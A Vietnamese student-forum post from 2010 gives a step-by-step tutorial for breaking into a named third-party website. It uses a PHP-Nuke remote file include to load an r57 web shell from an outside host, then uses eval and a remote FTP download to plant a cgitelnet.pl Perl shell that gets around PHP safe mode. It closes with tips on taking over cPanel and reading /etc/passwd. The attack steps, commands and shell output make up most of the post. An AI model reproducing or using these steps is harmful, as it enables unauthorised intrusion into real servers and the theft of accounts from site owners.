»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-»
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-»

.:hix lâu không làm web.nên giờ lười làm quá.dùng tạm cái Forum việt vậy.chủ yếu là chất lượng Những bài viết thôi đúng không.thật THà là nói hết không giấu diếm nhưng học xong cấm nghịch bậy..http://guichonguoiay.net.tf web mình đó RỖI VÀO CHơi Ha.hjhj:.
 
Trang ChínhPortalGalleryTìm kiếmLatest imagesĐăng kýĐăng Nhập
Thông Tin Cực Sock Cho Những Ai Nghiện Game Audition Của Thái Nguyên.Sau Một Thời Gian Tìm Hiểu Mà Nhờ Mấy Anh Ở forum ClbGame Mình Đã Cài THành Công Bản Audition Offline THái Nguyên.Sắp Tới Mình Sẽ Đưa Lên Online.Các Bạn Muốn Chơi Game Và Muốn Sở Hữu Những Bộ Đồ Đẹp Nhất Không Còn Chần Chừ Gì Nữa Mà Không Click Chuột Để Truy Cập Trang Web wWw.AuTn.tk Để Download Và Thưởng thức
Tìm kiếm
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
Navigation
 Portal
 Diễn Đàn
 Thành viên
 Lý lịch
 Trợ giúp
 Tìm kiếm
Diễn Đàn
Affiliates
free forum

Diễn Đàn

 

 Phương Pháp ByPass Safe-Mode

Go down 
Tác giảThông điệp
Admin
Admin



Tổng số bài gửi : 136
Join date : 13/03/2010

Phương Pháp ByPass Safe-Mode Empty
Bài gửiTiêu đề: Phương Pháp ByPass Safe-Mode   Phương Pháp ByPass Safe-Mode Icon_minitimeTue Mar 16, 2010 9:13 pm

1 Phương Pháp ByPass Safe-Mode



Lần trước có làm 1 cái video về cái này, nhưng nó hơi nặng , thôi hôm nay vít thành 1 Tút cho anh em dễ đọc hem

+Site victim của tôi là : http://tusivachungsinh.net/

Nhìn vào ta sẽ thấy nó xài Php-Nuke, mà thằng này thì dính đầy lỗi Critical . Ta check 1 lỗi phổ biến của nó để include shell xem
Lỗi này đã đc public khá lâu rồi,nhưng nhiều thằng ko chịu Update thì ta vẫn mần ăn đc hehe
vô milw0rm : http://milw0rm.com/exploits/1866 ( Bug PHP-Nuke <= All version - Remote File Include Vulnerabilities )
Qua lỗi này tôi get đc 1 con shell lên Host qua đường Link

Trích:

hxxp://tusivachungsinh.nt/modules/Forums/admin/admin_avatar.php?phpbb_root_path=hxxp://sheva7ac.googlepages.com/r57shell.txt?


Okies !

Đây là thông tin mà con r57 đem lại

Trích:

Linux hk2.vn-sg.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:44:44 EST 2006 i686 -
Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8
uid=32135 ( tusiva ) gid=32136 ( tusiva )
/home/tusiva/public_html/modules/Forums/admin/


Và thêm nữa là thằng này nó bật Safe-Mode, dis khá nhiều các hàm quan trọng

Trích:

safe_mode: ON
Disable functions : show_source,dl,exec,shell_exec,system,popen,pclose ,proc_open,proc_close,passthru,virtual,leak,chgrp, ini_alter,ini_restore


Command lệnh của con shell vì thế ko hiện đc luôn

Nhưng nhìn kĩ lại ta thấy uid=tusiva , vậy thì mặc mẹ nó ta có quyền owner của site này roài

Ta đã biết Safe-Mode bật và disable hết các hàm PHP chạy shell của ta, nhưng với các Script khác thì nó vô dụng

Vì thế tôi sẽ get 1 con shell dùng perl script lên server này , con mà anh em hay dùng là cgitelnet.pl (ngoài ra nghe nói còn có con shell ".cgi" nữa , chắc dùng vào đây cũng đc anh em ai có thì share nhé) ý tưởng là như vậy

+Đầu tiên tạo 1 thư mục riêng để làm việc cho sướng, mặc dù Safemode On nhưng các hàm bình thường của PHP vẫn chạy đc như thường (nếu nó dis hết thì có mà bán Host cho ma nó mua )

Trên con r57 ta gõ vào ô Eval PHP code :

Trích:

mkdir("./new", 0755);


ấn Excute , sau đó quay trở lại ta đã thấy trong thư mục /home/tusiva/public_html/modules/Forums/admin/ đã xuất hiện thêm 1 thư mục con "new" nữa với chmod là 755 roài (thư mục admin chmod thế nào cũng ko quan trọng vì mình đã có quyền owner của nó rồi)
Chuyển đến thư mục /home/tusiva/public_html/modules/Forums/admin/new để làm việc , Oke !

Tiếp theo là công đoạn Get con cgitelnet.pl lên Host, vào phần "Download files from remote ftp-server" trên con r57 ta điền vào thông tin của Host FTP có chứa con cgitelnet của ta

Trích:

FTP-server: netfast.org
Login: micimacko
Password: 123456
File on ftp: /wwwroot/cgitelnet.pl
Local file: /home/tusiva/public_html/modules/Forums/admin/new
Transfer mode: ASCII


rồi ấn Download để Transfer nó về Host

Quay lại thư mục new ta thấy có con cgitelnet.pl rồi , nó đang mặc định chmod là 644
Ta phải chmod lại cho nó thành 755, chạy PHPcode như sau:

Trích:

chmod("./cgitelnet.pl",0755);


Okies , đã xong !

Giờ ta vào Link hxxp://tusivachungsinh.nt/modules/Forums/admin/new/cgitelnet.pl đã thấy màn hình đen đen bí hiểm của con cgitelnet hehe, như vậy là ta đã có 1 command shell trên sv với uid=tusiva , bất chấp sv đang bật Safe-Mode

++Lưu ý: con cgitelnet.pl chỉ chạy đc với các đk sau:
-Get về Host với dạng ASCII
-chmod 755, thư mục chứa nó cũng phải có chmod 755 (thường ng ta Get về cgi-bin, nhưng thực ra ở đâu có 755 là đc)
-có 2 cái quan trọng nhất nữa là : uid=owner & sv hỗ trợ Perl


++Với con cgitelnet này có thể change File .contactemail để forgot pass lấy cPanel hay là cat /etc/passwd để xem File passwd

End!
Chúc thành công
.:micimacko -HcE:.
Về Đầu Trang Go down
https://itcu.forumvi.com
 
Phương Pháp ByPass Safe-Mode
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» cách bypass Anti của system (backdoor)

Permissions in this forum:Bạn không có quyền trả lời bài viết
»-(¯`v´¯)-»Diễn Đàn Trường Công Nghệ Thông Tin Thái Nguyên»-(¯`v´¯)-» :: Phận Làm Trai Gõ Phím Bình Thiên Hạ--Chí Anh Hùng Click Chuột Định Giang Sơn :: Những điều cơ bản để hack một trang web-
Chuyển đến